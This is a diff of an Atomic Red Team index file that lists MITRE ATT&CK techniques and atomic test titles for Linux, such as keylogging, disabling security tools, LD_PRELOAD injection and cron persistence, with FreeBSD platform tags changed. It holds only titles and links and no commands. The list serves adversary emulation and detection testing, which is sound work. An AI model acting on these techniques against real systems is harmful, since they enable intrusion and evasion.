- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux]
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux]
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
- [T1562 Impair Defenses](../../T1562/T1562.md)
@@ -73,18 +95,20 @@
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start Packet Filter [linux]
- Atomic Test #9: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #10: Turn off UFW logging [linux]
- Atomic Test #11: Add and delete UFW firewall rules [linux]
- Atomic Test #12: Add and delete Packet Filter rules [linux]
- Atomic Test #13: Edit UFW firewall user.rules file [linux]
- Atomic Test #14: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #15: Edit UFW firewall sysctl.conf file [linux]
@@ -94,8 +118,8 @@
- Atomic Test #19: Modify/delete iptables firewall rules [linux]
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
@@ -104,16 +128,21 @@
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- Atomic Test #7: Make and modify capabilities of a binary [linux]
- Atomic Test #8: Provide the SetUID capability to a file [linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
- Atomic Test #3: Logging Configuration Changes on Linux Host [linux]
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -128,16 +157,20 @@
- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Disable history collection (freebsd) [linux]
- Atomic Test #3: Mac HISTCONTROL [macos, linux]
- Atomic Test #4: Clear bash history [linux]
- Atomic Test #5: Setting the HISTCONTROL environment variable [linux]
- Atomic Test #6: Setting the HISTFILESIZE environment variable [linux]
- Atomic Test #7: Setting the HISTSIZE environment variable [linux]
- Atomic Test #8: Setting the HISTFILE environment variable [linux]
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
- Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable syslog (freebsd) [linux]
- Atomic Test #3: Disable Cb Response [linux]
- Atomic Test #4: Disable SELinux [linux]
- Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
@@ -145,28 +178,30 @@
- Atomic Test #40: Suspend History [linux]
- Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
- Atomic Test #42: Clear Pagging Cache [linux]
- Atomic Test #43: Disable Memory Swap [freebsd, linux]
- Atomic Test #43: Disable Memory Swap [linux]
- Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Decode base64 Data into Script [linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux]
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on FreeBSD [linux]
- Atomic Test #3: Install root CA on Debian/Ubuntu [linux]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [freebsd, linux, macos]
- Atomic Test #4: CC compile [freebsd, linux, macos]
- Atomic Test #5: Go compile [freebsd, linux, macos]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -177,10 +212,11 @@
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- Atomic Test #9: Delete Filesystem - FreeBSD [linux]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
@@ -190,15 +226,19 @@
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #2: Space After Filename [macos, linux]
- Atomic Test #3: Space After Filename (FreeBSD) [linux]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
@@ -208,6 +248,7 @@
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -216,31 +257,36 @@
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- Atomic Test #3: Firefox [freebsd, linux, windows, macos]
- Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap EXIT (freebsd) [linux]
- Atomic Test #3: Trap SIGINT [macos, linux]
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a FreeBSD system [linux]
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
- Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #4: Active Directory Create Admin Account [linux]
@@ -264,8 +310,9 @@
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
- Atomic Test #3: Add command to .shrc [linux]
- Atomic Test #4: Append to the system shell profile [linux]
- Atomic Test #5: Append commands user shell profile [linux]
- Atomic Test #6: System shell profile scripts [linux]
- Atomic Test #7: Create/Append to .bash_logout [linux]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -278,24 +325,31 @@
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- Atomic Test #4: rc.local (FreeBSD) [linux]
- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create SysV Service [linux]
- Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- Atomic Test #3: At - Schedule a job freebsd [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Create local account (FreeBSD) [linux]
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #12: Login as nobody (Linux) [linux]
- Atomic Test #13: Login as nobody (freebsd) [linux]
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -324,9 +378,10 @@
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -337,20 +392,20 @@
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
- Atomic Test #14: whois file download [freebsd, linux, macos]
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #27: Linux Download File and Run [linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [freebsd, macos, linux]
- Atomic Test #1: Connection Proxy [linux, macos]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -359,18 +414,21 @@
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: X Windows Capture (freebsd) [linux]
- Atomic Test #5: Capture Linux Desktop using Import Tool [linux]
- Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #5: Bash session based keylogger [freebsd, linux]
- Atomic Test #4: Logging sh history to syslog/messages [linux]
- Atomic Test #5: Bash session based keylogger [linux]
- Atomic Test #6: SSHD PAM keylogger [linux]
- Atomic Test #7: Auditd keylogger [linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -379,16 +437,17 @@
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux]
- Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -421,13 +480,17 @@
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Sudo usage (freebsd) [linux]
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
- Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -435,7 +498,9 @@
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap EXIT (freebsd) [linux]
- Atomic Test #3: Trap SIGINT [macos, linux]
- Atomic Test #4: Trap SIGINT (freebsd) [linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
@@ -443,12 +508,15 @@
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- Atomic Test #7: Make and modify capabilities of a binary [linux]
- Atomic Test #8: Provide the SetUID capability to a file [linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
@@ -464,8 +532,9 @@
- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #4: Append to the system shell profile [freebsd, linux]
- Atomic Test #5: Append commands user shell profile [freebsd, linux]
- Atomic Test #3: Add command to .shrc [linux]
